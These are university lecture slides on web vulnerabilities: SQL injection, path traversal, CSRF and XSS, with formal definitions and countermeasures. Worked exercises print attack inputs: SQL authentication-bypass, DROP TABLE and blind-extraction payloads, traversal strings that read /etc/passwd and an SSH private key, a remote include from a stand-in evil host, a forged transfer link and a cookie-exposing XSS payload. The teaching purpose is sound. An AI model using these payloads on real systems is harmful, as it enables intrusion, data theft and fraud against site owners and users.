1. 4MMSR - Information Systems Security
3 - web vulnerabilities and attacks
Fabien Duchene1 @fabien duchene
[Lecturer version]
1 Laboratoire d’Informatique de Grenoble, VASCO team
Grenoble Institute of Technology - Grenoble INP Ensimag
firstname.name@imag.fr
2011-2012
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 1/86 2011-2012 1 / 86
2. Outline
1 Injection
Introduction
Web Application: definition
2 Some web injections vulnerabilities
SQL Injection
Path Traversal
CSRF
XSS - Cross-Site scripting
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 2/86 2011-2012 2 / 86
3. Injection
Outline
1 Injection
Introduction
Web Application: definition
2 Some web injections vulnerabilities
SQL Injection
Path Traversal
CSRF
XSS - Cross-Site scripting
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 3/86 2011-2012 3 / 86
4. Injection Introduction
Injection I
Intuitive Definition
exploitation of a vulnerability that permits injecting data and/or code
on the target.
[Kunz 2011]
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 4/86 2011-2012 4 / 86
5. Injection Introduction
Injection II
Threat level [OWASP 2011]
Exploitability +++ EASY
Prevalence ++ COMMON
Detectability ++ AVERAGE
Impact +++ SEVERE
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 5/86 2011-2012 5 / 86
6. Injection Introduction
Some Injection vulnerabilities
An attacker’s goal: run code he controls on the subsystem
vulnerability targeted sub- what is in- impact
system jected
Buffer OverFlow,
Format String
SQL Injection
XSS
Path Traversal
(Some) causes
non sufficiently sanitized inputs
insecure use of input parameters
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 6/86 2011-2012 6 / 86
7. Injection Introduction
Some Injection vulnerabilities
An attacker’s goal: run code he controls on the subsystem
vulnerability targeted sub- what is in- impact
system jected
Buffer OverFlow, in memory exe- assembly data code execution
Format String cutable and instructions =⇒ integrity,
SQL Injection database SQL data and confidentiality,
commands availability of
XSS web application HTML / JS / data
(client browser) Java/... code
Path Traversal reading, writ- file name integrity, con-
ing, deleting fidentiality,
files availability of
files
(Some) causes
non sufficiently sanitized inputs
Fabien Duchene (LIG)
4MMSR-3-Web vulnerabilities and attacks 6/86 2011-2012 6 / 86
8. Injection Web Application: definition
Intuitive definition I
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 7/86 2011-2012 7 / 86
9. Injection Web Application: definition
Intuitive definition II
Inputs
HTTP request headers: names and values:
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 8/86 2011-2012 8 / 86
10. Injection Web Application: definition
Intuitive definition III
Outputs
HTTP Response HEADERS
HTTP Response BODY
..
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 9/86 2011-2012 9 / 86
11. Injection Web Application: definition
Web Application:Formal definition I
[Fabien Duchene 2012]
Let Σ be an alphabet.
A transition u of a web application is a mapping from n user inputs
ilu ∈ Σ∗ : Iu = i1 , ..., in to an output q = q1 · q2 · ... · qk , q ∈ Σ∗ . Each
u u
qj is either a webserver filtered input parameter ilu - i.e.
∃fr ∈ Filters , qj = fr (ilu ) - or a string qh surrounding one or two qj .
: :
q is (in many cases) generated by GO , the output grammar (eg:
HTML)
An input sequence is I = (I1 , ..., Im ) where each Iu adheres to the
above definition.
Filters is a finite set of functions from Σ∗ → Σ∗ such as PHP
addslashes().
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 10/86 2011-2012 10 / 86
12. Injection Web Application: definition
Web Application:Formal definition II
A web application is modeled as an Input Output Labelled Transition
System, in which each transition u conforms to the above definition.
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 11/86 2011-2012 11 / 86
13. Some web injections vulnerabilities
Outline
1 Injection
Introduction
Web Application: definition
2 Some web injections vulnerabilities
SQL Injection
Path Traversal
CSRF
XSS - Cross-Site scripting
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 12/86 2011-2012 12 / 86
14. Some web injections vulnerabilities SQL Injection
SQL Injection Attack (SQli) I
code injection at the database layer of an application
subsystem: SQL database
goal: read or alter (modify or delete) data
impact:
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 13/86 2011-2012 13 / 86
15. Some web injections vulnerabilities SQL Injection
SQL injection: schema
SQLi: a method
0. have a goal: what do you aim to do?
eg: steal and delete all customer data?
LOOP:
1.1 gain knowledge:
“how easy” can we inject?
do we have a helpful error message?
1.2 try the most interesting ones of the applicable exploitation
methods (wrt the current database knowledge)
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 14/86 2011-2012 14 / 86
16. Some web injections vulnerabilities SQL Injection
SQli: basic - “Incorrect type handling” I
Incorrect type handling
data is not strongly typed
in the example: an integer is expected, but the language interpreter
evaluates the whole expression
1 s t a t e m e n t := ”SELECT ∗ FROM w e a t h e r d a t a WHERE s t a t i o n= ” +
a variable + ”;”
1
Example: webgoat SQLi
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 15/86 2011-2012 15 / 86
17. Some web injections vulnerabilities SQL Injection
SQli: basic - “Incorrect type handling” II
Basic form. We submit it once and observe:
Once we submit, the station parameter seems to be used in the data
retrieval. Goal: to extract all the data from that database table
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 16/86 2011-2012 16 / 86
18. Some web injections vulnerabilities SQL Injection
SQli: basic - “Incorrect type handling” III
Have a look at the source code, and observe the parameter name
Since it is simpler to perform request by HTTP GET, give it a try:
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 17/86 2011-2012 17 / 86
19. Some web injections vulnerabilities SQL Injection
SQli: basic - “Incorrect type handling” IV
It works, the station parameter sent via a GET request is used by the
web application:
Let us try to inject: write a query so that it will always be evaluated
to TRUE
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 18/86 2011-2012 18 / 86
20. Some web injections vulnerabilities SQL Injection
SQli: basic - “Incorrect type handling” V
exploitation succeeds: we are able to extract all the records from that
table
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 19/86 2011-2012 19 / 86
21. Some web injections vulnerabilities SQL Injection
SQli: basic - “Incorrect type handling” VI
Also works if we use HTTP POST, here with Firefox Hackbar 2
Note: we only tried to get the data, but think about3
1 s t a t i o n =103 OR 1=1 ; DROP t a b l e w e a t h e r d a t a
1
[Webgoat - numeric SQL injection] Webgoat - numeric SQL injection
2
[Firefox hackbar add-on] Firefox hackbar add-on
3
Most SQL server implementations allow multiple statements. API do
generally not: PHP:mysql query() and Python:sqlite3.[.].execute() do not
support this. Some functions such as Python:sqllite3.[.].executescript() however
do
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 20/86 2011-2012 20 / 86
22. Some web injections vulnerabilities SQL Injection
SQLi: basic - “Incorrectly filtered escape characters” I
Incorrect type handling
user input is not filtered for escape characters (eg: ’ ” ..)
parameters are passed without using prepared statement
1 s t a t e m e n t = ”SELECT ∗ FROM u s e r s WHERE name = ’ ” + userName +
” ’; ”
How would you set the variable userName to bypass the
authentication?
A possible answer:
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 21/86 2011-2012 21 / 86
23. Some web injections vulnerabilities SQL Injection
SQLi: basic - “Incorrectly filtered escape characters” I
Incorrect type handling
user input is not filtered for escape characters (eg: ’ ” ..)
parameters are passed without using prepared statement
1 s t a t e m e n t = ”SELECT ∗ FROM u s e r s WHERE name = ’ ” + userName +
” ’; ”
How would you set the variable userName to bypass the
authentication?
A possible answer: ’ or ’trueblood’=’trueblood
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 21/86 2011-2012 21 / 86
24. Some web injections vulnerabilities SQL Injection
SQLi: basic - “Incorrectly filtered escape characters” II
1 s t a t e m e n t = ”SELECT ∗ FROM u s e r s WHERE name = ’ ” + userName +
” ’ ; UPDATE TABLE l o g o n a t t e m p t s SET a t t e m p t s=a t t e m p t s+1
WHERE name=’ ”+userName+” ’ ; ”
How do we prevent the logon attempt counter to increase for that
username?
A possible answer:
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 22/86 2011-2012 22 / 86
25. Some web injections vulnerabilities SQL Injection
SQLi: basic - “Incorrectly filtered escape characters” II
1 s t a t e m e n t = ”SELECT ∗ FROM u s e r s WHERE name = ’ ” + userName +
” ’ ; UPDATE TABLE l o g o n a t t e m p t s SET a t t e m p t s=a t t e m p t s+1
WHERE name=’ ”+userName+” ’ ; ”
How do we prevent the logon attempt counter to increase for that
username?
A possible answer:
Escape the second query thanks to SQL comments:
mario ; −−
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 22/86 2011-2012 22 / 86
26. Some web injections vulnerabilities SQL Injection
A Formal Definition of an SQL injection I
[Wassermann 2008]
Syntactic confinement
Given a Context-Free Grammar G = (V , Σ, S, R) nonterminals V ,
terminals Σ, a start symbol S, and production rules R. Let =⇒ G denote
“derives in one step”, st. if α, β ∈ (Σ ∪ V ) and A → γ ∈ R then
αAβ =⇒ G αγβ. Let =⇒ ∗G the reflexive transitive closure of =⇒ G
Also given a string σ = σ1 σ2 σ3 ∈ Σ∗ ,
σ2 is syntactically confined in σ iff:
there exists a sentential form σ1 X σ3 s.t. X ∈ (V ∪ Σ)
and S =⇒ ∗G σ1 X σ3 =⇒ ∗G σ1 σ2 σ3 .
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 23/86 2011-2012 23 / 86
27. Some web injections vulnerabilities SQL Injection
A Formal Definition of an SQL injection II
Sufficient condition for an SQL injection
GO , the output grammar is the SQL Grammar one. For a given e,
Ie = (i1 , i2 , ...in ), let the corresponding output be q = q1 + q2 + .. + qk .
e e e
If ∃ a qj in q s.t. qj is not syntactically confined in q then Ie is a SQL
: :
injection attack.
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 24/86 2011-2012 24 / 86
28. Some web injections vulnerabilities SQL Injection
A Formal Definition of an SQL injection III
For input parameter 2, no production rule could generate only the tainted
output 2::::::::::
:
OR 1 = 1.
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 25/86 2011-2012 25 / 86
29. Some web injections vulnerabilities SQL Injection
“Blind” SQLi I
Blind SQL injection?
production environment do not let you see the error outputs
when trying to inject in such a system: “blind injection”
more injection techniques on [Hackipedia - SQL injection]
4
Example: webgoat blind integer SQLIA
Assume a simple SELECT WHERE request such as:
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 26/86 2011-2012 26 / 86
30. Some web injections vulnerabilities SQL Injection
“Blind” SQLi II
1 SELECT ‘ f i e l d n a m e ‘ from ‘ t a b l e n a m e ‘ WHERE ‘ f i e l d 1 ‘= ’ a r g 1 ’
If we try a random number:
If we try to input a non integer:
generic error message (no “straightforward” information disclosure)
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 27/86 2011-2012 27 / 86
31. Some web injections vulnerabilities SQL Injection
“Blind” SQLi III
Is the application sensible to blind injection?
Yes!
Does such a record exist?
101 AND (SELECT COUNT(*) FROM pins WHERE
cc number=1111222233334444)>=1
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 28/86 2011-2012 28 / 86
32. Some web injections vulnerabilities SQL Injection
“Blind” SQLi IV
Now let us explore the possible space via dichotomy
101 AND (SELECT pin FROM pins WHERE
cc number=1111222233334444)<POWER(2,31)
... POWER(2,30)
... POWER(2,11): the first one (descending order) for which the
condition is evaluated to false
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 29/86 2011-2012 29 / 86
33. Some web injections vulnerabilities SQL Injection
“Blind” SQLi V
Thus the value is between 211 = 2048 and 212 = 4096 (stricly)
Now let us continue the dichotomy:
Still too high...
Now too low ...
We iterate that process, and finally:
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 30/86 2011-2012 30 / 86
34. Some web injections vulnerabilities SQL Injection
“Blind” SQLi VI
1 101 AND (SELECT p i n FROM p i n s WHERE c c n u m b e r
=1111222233334444) <(POWER( 2 , 1 1 )+POWER( 2 , 8 )+POWER( 2 , 5 )+
POWER( 2 , 4 )+POWER( 2 , 3 )+POWER( 2 , 2 )+POWER( 2 , 0 ) )
211 + 28 + 25 + 24 + 23 + 22 + 20 = 2365
Let us verify one last time that the value is 2364
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 31/86 2011-2012 31 / 86
35. Some web injections vulnerabilities SQL Injection
“Blind” SQLi VII
5
Blind string SQL Injection Attack
Similar: character per character discovery
by using the CHAR(x) (x: integer ; ex in ASCII encoding:
CHAR(41)=’A’ ; CHAR(61)=’a’)
ASCII(c) (c: character ; eg: ASCII(’a’)=61)
and SUBSTRING(str,start,length) SQL functions
Encoding-dependent: ASCII, UTF8, UTF16 ...
Heuristic: would promote characters of the assumed alphabet
4
[Webgoat - numeric SQL injection] Webgoat - numeric SQL injection
5
[Mavituna - SQL injection sheet 2007] Mavituna - SQL injection sheet
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 32/86 2011-2012 32 / 86
36. Some web injections vulnerabilities SQL Injection
SQLi blind string injection: exercise
we want to find the first character of the field user name of the table
users of the record with user id equal to 6969 ... thanks to the
following SQL request: (and we are able to manipulate $bet id)
we know that bet id = 3679 is a valid ID
1 ’ SELECT MAX( ‘ bet amount ‘ ) FROM ‘ b e t s ‘ WHERE ‘ b e t i d ‘= ’ +
$bet id + ’ ; ’
A possible answer:
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 33/86 2011-2012 33 / 86
37. Some web injections vulnerabilities SQL Injection
SQLi blind string injection: exercise
we want to find the first character of the field user name of the table
users of the record with user id equal to 6969 ... thanks to the
following SQL request: (and we are able to manipulate $bet id)
we know that bet id = 3679 is a valid ID
1 ’ SELECT MAX( ‘ bet amount ‘ ) FROM ‘ b e t s ‘ WHERE ‘ b e t i d ‘= ’ +
$bet id + ’ ; ’
A possible answer: Initialization:
3679’ AND (ASCII(SELECT SUBSTRING(user name,0,1) WHERE
user id=6969) > ((ASCII(’z’)-ASCII(’A’))/2) ; –
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 33/86 2011-2012 33 / 86
38. Some web injections vulnerabilities SQL Injection
SQLi Prevention I
input sanitization
only allow some characters
.. or explicitly deny some that have a meaning 6
strongly type the parameters
Use parameterized statements
Java
1 j a v a . s q l . PreparedStatement prep = connection . prepareStatement
(
”SELECT ∗ FROM u s e r s WHERE LASTNAME = ? AND
AGE = ? ” ) ;
3 prep . s e t S t r i n g (1 , lastname ) ;
p r e p . s e t I n t ( 2 , age ) ;
5 prep . executeQuery () ;
6
problem: might be encoding dependent (eg: UTF-8, UTF-16)
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 34/86 2011-2012 34 / 86
39. Some web injections vulnerabilities SQL Injection
SQLi Prevention II
PHP:
1 $ p s = $db−>p r e p a r e (
’ SELECT p a s t a , f l a v o r , q u a n t i t y , o r d e r d a y ’ .
3 ’FROM o r d e r s WHERE u s e r i d =? AND o r d e r m o n t h =? ’ ) ;
$ps−>e x e c u t e ( a r r a y ( $ c u r r e n t u s e r i d , $month ) ) ;
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 35/86 2011-2012 35 / 86
40. Some web injections vulnerabilities Path Traversal
Path Traversal
Path Traversal aka “../” (dot-dot-slash) vulnerability
performing operations (read, execute, write) on files, folders that the
web application developper(s) did not conceive the application for
impact:
security properties:
“LFI” Local File Inclusion
“RFI” Remote File Inclusion
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 36/86 2011-2012 36 / 86
41. Some web injections vulnerabilities Path Traversal
Path Traversal: schema I
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 37/86 2011-2012 37 / 86
42. Some web injections vulnerabilities Path Traversal
Path Traversal: schema II
A method
1. Observe the inputs dependencies regarding on which file an action
is performed (and eventually which action)
2. craft those inputs to perform the desired action(s) on the desired
file(s)
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 38/86 2011-2012 38 / 86
43. Some web injections vulnerabilities Path Traversal
Example I
<?php
2 $color = ’ blue ’ ;
i f ( i s s e t ( $ GET [ ’LANGUAGE ’ ] ) )
4 $ l a n g u a g e = $ GET [ ’LANGUAGE ’ ] ;
i n c l u d e ( $ l a n g u a g e . ’ . php ’ ) ;
6 ?>
8 <form method=” g e t ”>
< s e l e c t name=”LANGUAGE”>
10 <o p t i o n v a l u e=” e n g l i s h ”>e n g l i s h </o p t i o n >
<o p t i o n v a l u e=” c h i n e s e ”>c h i n e s e </o p t i o n >
12 </ s e l e c t >
<i n p u t t y p e=” s u b m i t ”>
14 </form>
1–files/file–include.php
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 39/86 2011-2012 39 / 86
44. Some web injections vulnerabilities Path Traversal
Path vulnerability example
How would you perform an HTTP GET request in order to
list the content of the /etc/passwd file?
LFI. A possible answer:
run code from a remote file?
RFI. A possible answer:
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 40/86 2011-2012 40 / 86
45. Some web injections vulnerabilities Path Traversal
Path vulnerability example
How would you perform an HTTP GET request in order to
list the content of the /etc/passwd file?
LFI. A possible answer: ?LANGUAGE=/etc/passwd%00
run code from a remote file?
RFI. A possible answer:
?LANGUAGE=’http://evilwebsite.ext/evilscript.ext%00
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 40/86 2011-2012 40 / 86
46. Some web injections vulnerabilities Path Traversal
Example II
Consider a similar PHP code, replace the include line:
...
2 i n c l u d e ( ” /home/ webapp1 / p u b l i c h t m l / c o d e / l a n g u a g e s / ” .
$language ) ;
...
How would you read the RSA SSH private key ( /.ssh/id rsa) of the
user orlando (/home/orlando) ?
Directory traversal. A possible answer:
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 41/86 2011-2012 41 / 86
47. Some web injections vulnerabilities Path Traversal
Example II
Consider a similar PHP code, replace the include line:
1 ...
i n c l u d e ( ” /home/ webapp1 / p u b l i c h t m l / c o d e / l a n g u a g e s / ” .
$language ) ;
3 ...
How would you read the RSA SSH private key ( /.ssh/id rsa) of the
user orlando (/home/orlando) ?
Directory traversal. A possible answer: ../../../../orlando/.ssh/id rsa
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 41/86 2011-2012 41 / 86
48. Some web injections vulnerabilities Path Traversal
Path traversal - countermeasures
(once more) input sanitization
limit file inclusion to a selected subset of directories. This can be
done at several layers:
interpreter (eg: PHP (allow url fopen allow url include), ASP.Net)
web-server (eg: Apache httpd) configuration)
chroot jails or similar systems (children processes will only be able to
open files within the defined chroot jail authorization)
enforce strict ACL on sensitive files and run websites on different
identity than the owner(s) of those sensitive files
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 42/86 2011-2012 42 / 86
49. Some web injections vulnerabilities CSRF
CSRF I
Cross Site Request Forgery: main objective
attacker tricks a victim to load.. a webpage on a legitimate
website
by loading that webpage, the victim will perform the action planned
by the attacker
Causes
web application is not able to distinguish between an automatic
action and a user-driven one
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 43/86 2011-2012 43 / 86
50. Some web injections vulnerabilities CSRF
CSRF II
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 44/86 2011-2012 44 / 86
51. Some web injections vulnerabilities CSRF
CSRF III
CSRF: detailed steps
1. application logic discovery: the attacker craft a precise HTTP
Request (including HTTP Headers, GET and/or POST parameters
and values) that if run by another user will perform the actions the
attacker desires
2. the victim has first to be authenticated
3. a malicious message is sent, for the request automatically to be
performed when the user reads it (eg: HTML via IM, twitter, email...)
4. the victim runs that code inside its browser, and actions are
performed without him noticing it
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 45/86 2011-2012 45 / 86
52. Some web injections vulnerabilities CSRF
CSRF example I
Aimelyne wants to trick Ilyas to receive 2000 USD from him via the
website payme.wtf
Application logic discovery
A uses the payme.wtf for a small amount 5 USD to Melissa
... and discovers that the following request is performed:
1 GET h t t p : / / payme . w t f / t r a n s f e r . do ? t o=M e l i s s a&amount=5 HTTP/ 1 . 1
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 46/86 2011-2012 46 / 86
53. Some web injections vulnerabilities CSRF
CSRF example II
Malicious link construction
How would A construct a malicious link so that people who will perform
that request would (if authenticated) send here 2000 USD?
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 47/86 2011-2012 47 / 86
54. Some web injections vulnerabilities CSRF
CSRF example II
Malicious link construction
How would A construct a malicious link so that people who will perform
that request would (if authenticated) send here 2000 USD?
http://payme.wtf/transfer.do?to=Aimleyne&amount=2000
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 47/86 2011-2012 47 / 86
55. Some web injections vulnerabilities CSRF
CSRF example III
Transmission to the victim
How would A send that link to the victim?
A possible answer:
The victim gets tricked
Assuming Ilyas is authenticated, if he clicks the link, Aimelyne will receive
the money.
What is the problem that now could occur?
Answer:
How to prevent that?
A solution:
7
7
We here assumed a GET request. POST request could also be tricked (eg:
HTML form, input submission triggered via javascript)
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 48/86 2011-2012 48 / 86
56. Some web injections vulnerabilities CSRF
CSRF example III
Transmission to the victim
How would A send that link to the victim?
A possible answer: email, instant messaging (eg: skype, gchat...)
The victim gets tricked
Assuming Ilyas is authenticated, if he clicks the link, Aimelyne will receive
the money.
What is the problem that now could occur?
Answer: Ilyas could notice that he just performed an action
How to prevent that?
A solution: force the HTTP GET request to be performed so that the
user does not notice it. eg: very small iframe, img, script, css, flash ...
basically anything a browser can load!
7
7
We here assumed a GET request. POST request could also be tricked (eg:
HTML form, input submission triggeredvulnerabilities and attacks
Fabien Duchene (LIG) 4MMSR-3-Web via javascript) 48/86 2011-2012 48 / 86
57. Some web injections vulnerabilities CSRF
CSRF countermeasures
client side:
Let the user to decide to perform a cross-site request [RequestPolicy
firefox add-on], [CsFire firefox add-on]
prevention redirections [Ryck et al. 2011]
server side:
for each form request, include a “fresh state token” (unaccepted
request if replay attack)
freshness requires a sufficient randomization
eg. dependencies: user identity, session, time, webpage from which the
request come from, form “status”
ASP.Net: viewstate
Java: Nothing out of the box, but ability to build it. OWASP
CSRFGuard
checking the HTTP header referer from which webpage does the
request come from? is it the very same website or at least one that I
do trust?
limiting the lifetime of tickets (eg: cookies)
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 49/86 2011-2012 49 / 86
58. Some web injections vulnerabilities XSS - Cross-Site scripting
X whaaat? I
XSS (aka Cross Site Scripting) is a code injection vulnerability within
web applications. Exploiting it allows an attacker to inject code (eg:
html, javascript, flash...) and to run it in the visitor context (victim’s
browser) in order to bypass access control mechanisms (eg:
Same-Origin Policy)
“Cross-site”: code from another source is run onto the attacked
website.
12,885 XSS vulnerabilities reported in 2008 8
XSS starts with a X because... not to be counfonded with CSS
XSS ...
are executed on the client
targets client side
data eg: session cookies
control
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 50/86 2011-2012 50 / 86
59. Some web injections vulnerabilities XSS - Cross-Site scripting
X whaaat? II
How attackers do have fun?
silently install a malware in your browser
steal your session credentials (eg: cookies)
use your browser as part of a botnet
http only: http://fd.the-wildcat.de/apache e36a9cf46c.php
Same origin policy
security boundary based on the very same (fqdn, port, and protocol)
only the very same “entity” can access for instance user credentials
eg:
https://ocarina.imag.fr/page1.py
http://ocarina.imag.fr/page3.html
http://ocarina.imag.fr:82/page5.php
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 51/86 2011-2012 51 / 86
60. Some web injections vulnerabilities XSS - Cross-Site scripting
X whaaat? III
Causes
HTML mix content, control statements and formatting
cross site requests allowed by default
8
[Symantec 2009] Symantec Global Internet Security Threat Report - trends
for 2008
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 52/86 2011-2012 52 / 86
61. Some web injections vulnerabilities XSS - Cross-Site scripting
Where can it be found? I
any website processing arguments (HTTP GET, POST ...)
mail.google.com [Amit 2010] Cross-Site Scripting through Flash in
Gmail Based Services
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 53/86 2011-2012 53 / 86
62. Some web injections vulnerabilities XSS - Cross-Site scripting
Where can it be found? II
m.facebook.com [CrazyDaVinci 2011] Autopost Spamming using
Facebook Mobile XSS
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 54/86 2011-2012 54 / 86
63. Some web injections vulnerabilities XSS - Cross-Site scripting
XSS classification
According to the minimal number of executed transitions (a couple of
SUT request + answer)
type 0 XSS
type 1 XSS / reflected / non-persistent:
type 2 XSS / stored / persistent:
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 55/86 2011-2012 55 / 86
64. Some web injections vulnerabilities XSS - Cross-Site scripting
Reflected XSS / type 1 attack
9
9
[IBM 2002] Cross-site scripting
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 56/86 2011-2012 56 / 86
65. Some web injections vulnerabilities XSS - Cross-Site scripting
Reflected XSS / type 1 attack
Reflected XSS
aka non-persistent / type 1
“easy” to trigger
the most found in terms of number of vulnerabilities
different from CSRF! why?
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 57/86 2011-2012 57 / 86
66. Some web injections vulnerabilities XSS - Cross-Site scripting
Reflected XSS / type 1 attack
Reflected XSS
aka non-persistent / type 1
“easy” to trigger
the most found in terms of number of vulnerabilities
different from CSRF! why? .. code execution on the client side!
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 57/86 2011-2012 57 / 86
67. Some web injections vulnerabilities XSS - Cross-Site scripting
Reflected XSS - example I
web application: online shop
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 58/86 2011-2012 58 / 86
68. Some web injections vulnerabilities XSS - Cross-Site scripting
Reflected XSS - example II
after submitting the form
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 59/86 2011-2012 59 / 86
69. Some web injections vulnerabilities XSS - Cross-Site scripting
Reflected XSS - example III
observe the HTTP Request parameters:
What are their names and their assumed types?
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 60/86 2011-2012 60 / 86
70. Some web injections vulnerabilities XSS - Cross-Site scripting
Reflected XSS - example III I
attempt to inject in QTY1:
1 QTY1=1a<img s r c=m a r i o . g i f o n e r r o r= a l e r t ( 1 )>
try to inject another field. eg: field1
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 61/86 2011-2012 61 / 86
71. Some web injections vulnerabilities XSS - Cross-Site scripting
Reflected XSS - example III II
1 QTY1=1a<img s r c=m a r i o . g i f o n e r r o r= a l e r t ( 1 )>&QTY2=1&QTY3=1&
QTY4=1& f i e l d 2 =4128+3214+0002+1999& f i e l d 1 =111<img s r c=m a r i o
. g i f o n e r r o r= a l e r t ( document . c o o k i e )>&SUBMIT=P u r c h a s e
success! we are able to inject some code! here, we showed that we
can steal the victim cookies
we can transfer the crafted URL to the victim via: twitter, IM, email
... (even shorten it eg: bit.ly )
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 62/86 2011-2012 62 / 86
72. Some web injections vulnerabilities XSS - Cross-Site scripting
Type 1 - XSS a formal definition I
[Fabien Duchene 2012]
Let q be the following extract of the SUT output:
1 <a name=” [ USER INFLUENCED INPUT ] ”>Hola !</a>
q = q1 + q2 + q3
::
GO : HTML grammar (actually depends WHERE we can inject: JS, Flash..)
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 63/86 2011-2012 63 / 86
73. Some web injections vulnerabilities XSS - Cross-Site scripting
Type 1 - XSS a formal definition II
Extract of the Parse Tree TG0 of the SUT output
<a
name
A ATTR NAME =
":::::::
kalimu"
A LEFT A ATTR
onclick
:::::::
A ATTR ONC =
::
"alert(1)"
:::::::::
>
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 64/86 2011-2012 64 / 86
74. Some web injections vulnerabilities XSS - Cross-Site scripting
Stored XSS / type 2 attack I
10
10
[IBM 2002] Cross-site scripting
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 65/86 2011-2012 65 / 86
75. Some web injections vulnerabilities XSS - Cross-Site scripting
Stored XSS
interesting for browser worms
impact more important (eg: Facebook wall)
in brief: data stored on the server and displayed with only the
victim interaction
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 66/86 2011-2012 66 / 86
76. Some web injections vulnerabilities XSS - Cross-Site scripting
Stored XSS - example I
[WebGoat - the vulnerable web application] WebGoat - the vulnerable
web application
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 67/86 2011-2012 67 / 86
77. Some web injections vulnerabilities XSS - Cross-Site scripting
Stored XSS - example II
Login form
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 68/86 2011-2012 68 / 86
78. Some web injections vulnerabilities XSS - Cross-Site scripting
Stored XSS - example III
Profile visualization
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 69/86 2011-2012 69 / 86
79. Some web injections vulnerabilities XSS - Cross-Site scripting
Stored XSS example
Profile edition
Any idea?
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 70/86 2011-2012 70 / 86
80. Some web injections vulnerabilities XSS - Cross-Site scripting
Stored XSS example
Profile edition
Any idea?
